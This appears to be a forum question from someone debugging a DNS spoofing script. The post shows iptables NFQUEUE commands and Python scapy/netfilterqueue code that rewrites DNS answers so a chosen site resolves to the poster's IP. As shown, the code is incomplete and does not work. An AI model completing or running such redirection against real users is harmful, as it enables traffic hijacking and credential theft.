I want to redirect user for example from bing.com to page with my IP. Every time when I start code it shows that DNS spoofing is working, but page not loading, page says that connection lost.
I'm working from Linux and wrote all commands in terminal likesudo iptables -I OUTPUT -j NFQUEUE --queue-num 0
and sudo iptables -I INPUT -j NFQUEUE --queue-num 0
then run the program
import optparse
import netfilterqueue
import scapy.all as scapy
def get_arguments():
parser = optparse.OptionParser()
parser.add_option("-i", "--ip", dest="ip", help="Your IP")
parser.add_option("-w", "--website", dest="web_site", help="Web site that you want to spoof")
arguments = parser.parse_args()[0]
if not arguments.ip:
parser.error("[-] Set your IP, use -h for more info")
if not arguments.web_site:
parser.error("[-] Set web site, use -h for more info")
return arguments
def process_packet(packet):
arguments = get_arguments()
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.DNSRR):
qname = scapy_packet[scapy.DNSQR].qname
if arguments.web_site in qname:
answer = scapy.DNSRR(rrname=qname, rdata=arguments.ip)
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].chksum
del scapy_packet[scapy.UDP].len
print("[+] Spoofing target")
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)